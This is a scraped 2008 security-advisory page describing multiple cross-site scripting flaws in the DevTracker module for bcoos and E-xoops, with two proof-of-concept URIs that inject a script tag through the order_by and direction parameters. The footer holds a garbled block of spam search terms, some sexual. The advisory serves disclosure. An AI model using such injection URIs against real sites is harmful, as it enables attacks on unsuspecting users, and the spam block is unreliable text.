about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , DevTracker Module For bcoos and E-xoops Multiple Cross-Site Scripting Vulnerabilities


Title DevTracker Module For bcoos and E-xoops Multiple Cross-Site Scripting Vulnerabilities
Published 2008-02-04-12:00AM
Updated 2008-02-05-11:26PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Lostmon lords <lostmon@gmail.com> discovered these vulnerabilities.
Vulnerable  EXoops EXoops 1.0.8
bcoos bcoos 1.1.11
Not Vulnerable  
Code  Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.The following proof-of-concept URIs are available:http://www.example.com/modules/devtracker/index.php?proj_id=1&amp;order_by=priority&amp;direction=ASCquot;&gt;&lt;script&gt;alert()&lt;/script&gt; http://www.example.com/modules/devtracker/index.php?proj_id=1&amp;order_by=priorityquot;&gt;&lt;script&gt;alert()&lt;/script&gt;&amp;direction=ASC
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 11 Dec 2009 23:17:08 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
tamil cine Kushpoo ho 200 /compo chat mygam www.indan news for c sex movis, Kushboo SE Sex wemen 200 /compo www.255265 news searc php includ Pantyless www.028tx. Video musi news for c pass includes/f Kawin+sex stqfxx.com Http//secu pass mosConfig_ Crack Data Www.angeli wwwhotsexc pornorrabi Kanchana M 200 //admi BELLACLUB. IceWarp We www.sex mo Fuckingpic Jyoti str youkumv.co 200 /compo photo womw www.yuanfe www.lankak news for c suzhou.9ch indian sex Www.99.com French Lan cv samples Julia fere www.200951 Www.sexyfr all cartoo